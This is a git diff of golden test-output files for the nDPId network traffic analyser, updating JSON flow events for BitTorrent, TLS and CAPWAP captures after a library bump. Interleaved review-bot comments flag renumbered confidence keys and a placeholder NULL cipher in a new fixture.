b/test/results/bt_search.pcap.out index 457d04fbd..b02c823c5 100644 
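Review bot: The numeric key inside `ndpi.confidence` is not stable across this bump: the `detected` and `end` events for flow 1 now carry `{"6":"DPI"}` where they carried `{"4":"DPI"}`, and the bt_search.pcap.out hunk moves `DPI (cache)` from `"3"` to `"5"`. A consumer that filters or alerts on the integer rather than the label would, after upgrading, match whatever level now sits at the old number without any error. The renumbering deserves a line in the changelog or event documentation, for example `ndpi.confidence ids changed with this libnDPI bump; match on the string value, not the numeric key`.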
--- a/test/results/bt_search.pcap.out +++ b/test/results/bt_search.pcap.out 
@@ -2,7 +2,7 @@ 00549{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"bt_search.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1430752225251} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"bt_search.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430752225251,"flow_last_seen":1430752225251,"flow_idle_time":200000,"flow_min_l4_payload_len":119,"flow_max_l4_payload_len":119,"flow_tot_l4_payload_len":119,"flow_avg_l4_payload_len":119,"midstream":0,"thread_ts_msec":1430752225251,"l3_proto":"ip4","src_ip":"192.168.0.102","dst_ip":"239.192.152.143","src_port":6771,"dst_port":6771,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00596{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"bt_search.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1430752225251,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":161,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":161,"pkt_l4_len":127,"thread_ts_msec":1430752225251,"pkt":"AQBeQJiPABZEH1lmCABFAACTaOEAAP8RCRrAqABm78CYjxpzGnMAf8gHQlQtU0VBUkNIICogSFRUUC8xLjENCkhvc3Q6IDIzOS4xOTIuMTUyLjE0Mzo2NzcxDQpQb3J0OiA2MTE5Nw0KSW5mb2hhc2g6IEVENEYxMDg1RTg4NUY5OEY5QTY5QjcwRUU4OUVCOTg4QjhGRDkxMTUNCg0KDQo="} 
-00687{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"bt_search.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430752225251,"flow_last_seen":1430752225251,"flow_idle_time":200000,"flow_min_l4_payload_len":119,"flow_max_l4_payload_len":119,"flow_tot_l4_payload_len":119,"flow_avg_l4_payload_len":119,"midstream":0,"thread_ts_msec":1430752225251,"l3_proto":"ip4","src_ip":"192.168.0.102","dst_ip":"239.192.152.143","src_port":6771,"dst_port":6771,"l4_proto":"udp","ndpi": {"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":""}} +00687{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"bt_search.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430752225251,"flow_last_seen":1430752225251,"flow_idle_time":200000,"flow_min_l4_payload_len":119,"flow_max_l4_payload_len":119,"flow_tot_l4_payload_len":119,"flow_avg_l4_payload_len":119,"midstream":0,"thread_ts_msec":1430752225251,"l3_proto":"ip4","src_ip":"192.168.0.102","dst_ip":"239.192.152.143","src_port":6771,"dst_port":6771,"l4_proto":"udp","ndpi": {"confidence": {"5":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":""}} 00597{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"bt_search.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1430752525284,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":161,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":161,"pkt_l4_len":127,"thread_ts_msec":1430752525284,"pkt":"AQBeQJiPABZEH1lmCABFAACTCiwAAP8RZ8\/AqABm78CYjxpzGnMAf8gHQlQtU0VBUkNIICogSFRUUC8xLjENCkhvc3Q6IDIzOS4xOTIuMTUyLjE0Mzo2NzcxDQpQb3J0OiA2MTE5Nw0KSW5mb2hhc2g6IEVENEYxMDg1RTg4NUY5OEY5QTY5QjcwRUU4OUVCOTg4QjhGRDkxMTUNCg0KDQo="} 
00588{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2,"source":"bt_search.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1430752225251,"flow_last_seen":1430752525284,"flow_idle_time":200000,"flow_min_l4_payload_len":119,"flow_max_l4_payload_len":119,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":119,"midstream":0,"thread_ts_msec":1430752525284,"l3_proto":"ip4","src_ip":"192.168.0.102","dst_ip":"239.192.152.143","src_port":6771,"dst_port":6771,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00553{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":2,"source":"bt_search.pcap","alias":"nDPId-test","packets-captured":2,"packets-processed":2,"total-skipped-flows":0,"total-l4-payload-len":238,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":8,"global_ts_msec":1430752525284} @@ -14,9 +14,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 6131633 bytes -~~ total memory freed........: 6131633 bytes -~~ total allocations/frees...: 118117/118117 +~~ total memory allocated....: 6265267 bytes +~~ total memory freed........: 6265267 bytes +~~ total allocations/frees...: 120879/120879 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 465 chars ~~ json string max len.......: 692 chars diff --git a/test/results/cachefly.pcapng.out b/test/results/cachefly.pcapng.out new file mode 100644 index 000000000..270f2c3d7 --- /dev/null +++ b/test/results/cachefly.pcapng.out 
@@ -0,0 +1,26 @@ +00461{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"cachefly.pcapng","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} +00550{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"cachefly.pcapng","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1639053996915} +00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"cachefly.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1639053996915,"flow_last_seen":1639053996915,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1639053996915,"l3_proto":"ip4","src_ip":"10.10.10.1","dst_ip":"192.168.0.1","src_port":443,"dst_port":43766,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"cachefly.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1639053996915,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1639053996915,"pkt":"AAAAAAAAAAEAzkGkCABFAAA8AABAADgGbggKCgoBwKgAAQG7qvYcGrARC\/df8aASOJAXeAAAAgQFtAQCCAr4WKdZ8aCtGAEDAwk="} +01168{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"cachefly.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1639053997244,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":583,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":583,"pkt_l4_len":549,"thread_ts_msec":1639053997244,"pkt":"AAAAAAAAAAEAzkGkCABFAAI5KtdAAD8GOjTAqAABCgoKAar2AbsL91\/xHBqwEoAYAECN7gAAAQEICvGgrmz4WKdZFgMBAgABAAH8AwN5I1ozU7xInxtJozbyruWCcUxU4dIiuEr772yEdl+IjiA8lzzThjK9JFGzvzmsOf5jh+xiqEIzY+\/b\/bu2q\/rhKgAgysoTARMCEwPAK8AvwCzAMMypzKjAE8AUAJwAnQAvADUBAAGTKioAAAAAABcAFQAAEmFwcHR2LmNhY2hlZmx5Lm5ldAAXAAD\/AQABAAAKAAoACBoaAB0AFwAYAAsAAgEAACMAAAAQAA4ADAJoMghodHRwLzEuMQAFAAUBAAAAAAANABIAEAQDCAQEAQUDCAUFAQgGBgEAEgAAADMAKwApGhoAAQAAHQAgnPDvY\/VXlPM6JRGRsi41pgbweEr23XZr7mS8KeaUbX0ALQACAQEAKwALCjo6AwQDAwMCAwEAGwADAgACRGkABQADAmgyiooAAQAAFQDBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 
+00899{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"cachefly.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1639053996915,"flow_last_seen":1639053997244,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":258,"midstream":0,"thread_ts_msec":1639053997244,"l3_proto":"ip4","src_ip":"10.10.10.1","dst_ip":"192.168.0.1","src_port":443,"dst_port":43766,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"apptv.cachefly.net","ja3":"cd08e31494f9531f560d64c695473da9","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +02281{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"cachefly.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1639053997267,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1414,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1414,"pkt_l4_len":1380,"thread_ts_msec":1639053997267,"pkt":"AAAAAAAAAAEAzkGkCABFAAV41QdAADgGk8QKCgoBwKgAAQG7qvYcGrASC\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\/+fRCDTZEScrfWCMFyaixKeqElAO7ykgeSwfvJjJ0wnRMXDhl9Jl08jKWm\/d3Hktb+0la4oTxnWOXZAHkeMPMd8z5IEjNstMoXVnzzvYTEc4hes6PN3Tko5DyTkpvaiHk24ljRERvEWhRYaw4RnKrT9b+zSwlZOueaejMtqkfNRXDPSR1x3Jl2oQbiXO5T+fqoY+sZN6tOhj6mQW65LLPhC4vk+E4JPhFb1yN\/vHAl5Nki2qqUNydYyxklH4FNUrCnzcInO8MG4k4UvzfLoF5IOdgByO3cVOhvWff2S\/Iy1d3+tC7BZ3FL7Yj\/WhfXV+SI\/dS2PepELisfoFHyq5sCAwEAAaOCB8YwggfCMA4GA1UdDwEB\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"} 
+00955{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3,"source":"cachefly.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1639053996915,"flow_last_seen":1639053997267,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1348,"flow_tot_l4_payload_len":1865,"flow_avg_l4_payload_len":621,"midstream":0,"thread_ts_msec":1639053997267,"l3_proto":"ip4","src_ip":"10.10.10.1","dst_ip":"192.168.0.1","src_port":443,"dst_port":43766,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"apptv.cachefly.net","ja3":"cd08e31494f9531f560d64c695473da9","ja3s":"8d2a028aa94425f76ced7826b1f39039","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +02393{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"cachefly.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1639053996915,"flow_last_seen":1639053997267,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1348,"flow_tot_l4_payload_len":5759,"flow_avg_l4_payload_len":959,"midstream":0,"thread_ts_msec":1639053997267,"l3_proto":"ip4","src_ip":"10.10.10.1","dst_ip":"192.168.0.1","src_port":443,"dst_port":43766,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Cachefly","breed":"Acceptable","category":"Cloud"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"apptv.cachefly.net","server_names":"*.cachefly.net,get.taxcycle.com,books24x7.com,siteclosed.overdrive.com,c.adventurerv.net,download.acoustica.com,cdn.arstechnica.net,ocp.cscglobal.com,cdn-w.gettraffic.com,cf.cdn.poundstopocket.co.uk,cf.cdn.cashnetusa.com,cf.cdn.quickquid.co.uk,downloads.oncenter.com,cache.green1020.com,software.onthehub.com,code.murdoog.com,img.tradepub.com,images.overdrive.com,static.readyflowers.com,cdn.richrelevance.com,qastatic.richrelevance.net,cache.agilebits.com,cachefly.alfredapp.com,download.fosshub.com,cdncontent.skillsoftcompliance.com,cdnlibrary.qual.skillport.com,cdnlibrary.skillport.com,cdnlibrary.skillport.eu,cdnlibrary-otls.skillport.com,st-cdn01.net-perform.com,assets.yandycdn.com,cdn.nexternal.com,www.workcred.org,img.sedoparking.com,www.standardsboostbusiness.org,cdn.sparklingsociety.net,smartupdate1.centralpointnow.com,cdn.edgeuno.com,downloads.pdf-xchange.com,cachefly.kinematics.com,cachefly.discoverinspire.com,static.volotea.com,*.cachefly.com,*.pluralsight.com,*.cdn.overdrive.com,*.contentreserve.com,*.listen.overdrivechina.cn,*.od-cdn.com,*.overdrivechina.cn,*.read.overdrivechina.cn,*.rbxcdn.com,*.books24x7.com,*.ansi.org,*.livee.com,cachefly.net","ja3":"cd08e31494f9531f560d64c695473da9","ja3s":"8d2a028aa94425f76ced7826b1f39039","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=BE, O=GlobalSign nv-sa, CN=GlobalSign RSA OV SSL CA 2018","subjectDN":"C=US, ST=Illinois, L=Chicago, O=Cachenetworks, LLC, CN=*.cachefly.net","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"14:84:4F:1F:E8:A1:78:8A:12:27:36:B8:42:AB:42:52:FC:3B:C4:BA"}} 
+00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6,"source":"cachefly.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1639053996915,"flow_last_seen":1639053997267,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1348,"flow_tot_l4_payload_len":5759,"flow_avg_l4_payload_len":959,"midstream":0,"thread_ts_msec":1639053997267,"l3_proto":"ip4","src_ip":"10.10.10.1","dst_ip":"192.168.0.1","src_port":443,"dst_port":43766,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Cachefly","breed":"Acceptable","category":"Cloud"}} +00556{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":6,"source":"cachefly.pcapng","alias":"nDPId-test","packets-captured":6,"packets-processed":6,"total-skipped-flows":0,"total-l4-payload-len":5759,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":2,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":11,"global_ts_msec":1639053997267} +~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ +~~ packets captured/processed: 6/6 +~~ skipped flows.............: 0 +~~ total layer4 data length..: 5759 bytes +~~ total detected protocols..: 1 +~~ total active/idle flows...: 1/1 +~~ total timeout flows.......: 0 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~ total memory allocated....: 6050694 bytes +~~ total memory freed........: 6050694 bytes +~~ total allocations/frees...: 120945/120945 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~ json string min len.......: 466 chars +~~ json string max len.......: 2398 chars +~~ json string avg len.......: 1404 chars diff --git a/test/results/capwap.pcap.out b/test/results/capwap.pcap.out index 7393f7c8f..621adcb60 100644 
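Review bot: The new fixture pins a `detected` event (packet_id 2) that reports `"cipher":"TLS_NULL_WITH_NULL_NULL"` together with `"unsafe_cipher":0` and an empty `"ja3s"`. The `detection-update` at packet_id 3 then reports `TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256` and a populated `ja3s`, so the first value looks like an unset placeholder emitted before the ServerHello was parsed rather than a negotiated NULL cipher. A rule that keys on the cipher name in `detected` events would flag this flow as unencrypted, so the golden file bakes in a false positive for downstream detections. Leaving `cipher` and `ja3s` out of the `tls` object until the server side has been seen would avoid this, if that is what is happening. The serialisation code is outside this diff, so the fix itself has to be made there.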
--- a/test/results/capwap.pcap.out +++ b/test/results/capwap.pcap.out 
@@ -2,10 +2,10 @@ 00546{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"capwap.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1422328949167} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"capwap.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1422328949167,"flow_last_seen":1422328949167,"flow_idle_time":200000,"flow_min_l4_payload_len":65,"flow_max_l4_payload_len":65,"flow_tot_l4_payload_len":65,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1422328949167,"l3_proto":"ip4","src_ip":"192.168.10.9","dst_ip":"192.168.10.10","src_port":5246,"dst_port":12379,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00523{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"capwap.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1422328949167,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":107,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":107,"pkt_l4_len":73,"thread_ts_msec":1422328949167,"pkt":"uDhh8wWsJOmzR64gCABFwABdANlAAH8RZJPAqAoJwKgKChR+MFsASQAAAQAAABX+\/wABAAAAAAABADCRUl3gOBqBz\/u8XElQaHVuhYA4Oyehwv8gEXQ+BVAOU1L6bxnlZCgpb3mFtLC\/ZhI="} 
-00639{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"capwap.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1422328949167,"flow_last_seen":1422328949167,"flow_idle_time":200000,"flow_min_l4_payload_len":65,"flow_max_l4_payload_len":65,"flow_tot_l4_payload_len":65,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1422328949167,"l3_proto":"ip4","src_ip":"192.168.10.9","dst_ip":"192.168.10.10","src_port":5246,"dst_port":12379,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"CAPWAP","breed":"Acceptable","category":"Network"}} +00639{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"capwap.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1422328949167,"flow_last_seen":1422328949167,"flow_idle_time":200000,"flow_min_l4_payload_len":65,"flow_max_l4_payload_len":65,"flow_tot_l4_payload_len":65,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1422328949167,"l3_proto":"ip4","src_ip":"192.168.10.9","dst_ip":"192.168.10.10","src_port":5246,"dst_port":12379,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"CAPWAP","breed":"Acceptable","category":"Network"}} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"capwap.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1422328963915,"flow_last_seen":1422328963915,"flow_idle_time":200000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":41,"flow_tot_l4_payload_len":41,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1422328963915,"l3_proto":"ip4","src_ip":"192.168.10.10","dst_ip":"255.255.255.255","src_port":49259,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"capwap.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1422328963915,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":83,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":83,"pkt_l4_len":49,"thread_ts_msec":1422328963915,"pkt":"\/\/\/\/\/\/\/\/uDhh8wWsCABFAABFAAEAAP8R8PTAqAoK\/\/\/\/\/8BrADUAMQAA9LUBAAABAAAAAAAAF0NJU0NPLUNBUFdBUC1DT05UUk9MTEVSAAABAAE="} -00776{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"capwap.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1422328963915,"flow_last_seen":1422328963915,"flow_idle_time":200000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":41,"flow_tot_l4_payload_len":41,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1422328963915,"l3_proto":"ip4","src_ip":"192.168.10.10","dst_ip":"255.255.255.255","src_port":49259,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"cisco-capwap-controller","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00776{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"capwap.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1422328963915,"flow_last_seen":1422328963915,"flow_idle_time":200000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":41,"flow_tot_l4_payload_len":41,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1422328963915,"l3_proto":"ip4","src_ip":"192.168.10.10","dst_ip":"255.255.255.255","src_port":49259,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": 
{"query":"cisco-capwap-controller","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"capwap.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1422328966914,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":83,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":83,"pkt_l4_len":49,"thread_ts_msec":1422328966914,"pkt":"\/\/\/\/\/\/\/\/uDhh8wWsCABFAABFAAIAAP8R8PPAqAoK\/\/\/\/\/8BrADUAMQAA9LUBAAABAAAAAAAAF0NJU0NPLUNBUFdBUC1DT05UUk9MTEVSAAABAAE="} 00181{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":4,"source":"capwap.pcap","alias":"nDPId-test","layer_type":351,"global_ts_msec":1422328970067} 00756{"packet_event_id":1,"packet_event_name":"packet","packet_id":4,"source":"capwap.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":365,"pkt_type":351,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":365,"pkt_l4_len":0,"thread_ts_msec":1422328966914,"pkt":"AQAMzMzMuDhh8wWsAV+qqgMAAAwgAAK0db0AAQAUQVBiODM4LjYxZjMuMDVhYwAFAPJDaXNjbyBJT1MgU29mdHdhcmUsIEMyNjAwIFNvZnR3YXJlIChBUDNHMi1LOVc4LU0pLCBWZXJzaW9uIDE1LjIoNClKQTEsIFJFTEVBU0UgU09GVFdBUkUgKGZjMikKVGVjaG5pY2FsIFN1cHBvcnQ6IGh0dHA6Ly93d3cuY2lzY28uY29tL3RlY2hzdXBwb3J0CkNvcHlyaWdodCAoYykgMTk4Ni0yMDEzIGJ5IENpc2NvIFN5c3RlbXMsIEluYy4KQ29tcGlsZWQgVHVlIDMwLUp1bC0xMyAyMjo1NyBieSBwcm9kX3JlbF90ZWFtAAYAG2Npc2NvIEFJUi1DQVAyNjAySS1RLUs5AAIAEQAAAAEBAcwABMCoCgoAAwAUR2lnYWJpdEV0aGVybmV0MAAEAAgAAAADAAsABQE="} 
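Review bot: The key inside `ndpi.confidence` changes from `"4"` to `"6"` for the same `"DPI"` label on both `detected` events in this hunk, and the later capwap.pcap.out hunks and the cassandra.pcap.out hunk show the same shift, while the commit message only says the library was bumped. Presumably the confidence enum was renumbered upstream. If so, any consumer or detection rule that filters on the numeric key rather than the name would silently read these DPI results as a different confidence level. I would record this in the commit description or changelog with a line such as `ndpi.confidence: numeric key for "DPI" changes 4 -> 6; consumers should match on the name, not the number`.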
